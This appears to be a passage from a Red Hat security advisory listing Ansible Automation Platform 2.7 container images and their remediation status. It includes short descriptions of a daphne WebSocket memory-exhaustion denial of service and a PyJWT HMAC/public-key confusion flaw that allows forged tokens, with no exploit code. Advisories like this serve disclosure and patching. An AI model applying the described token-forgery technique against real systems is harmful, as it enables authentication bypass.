| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in daphne. An unauthenticated remote attacker could exploit this vulnerability by sending arbitrarily large WebSocket messages or frames. This oversight in payload size handling can lead to excessive memory consumption, resulting in a denial of service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer's public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — | ||
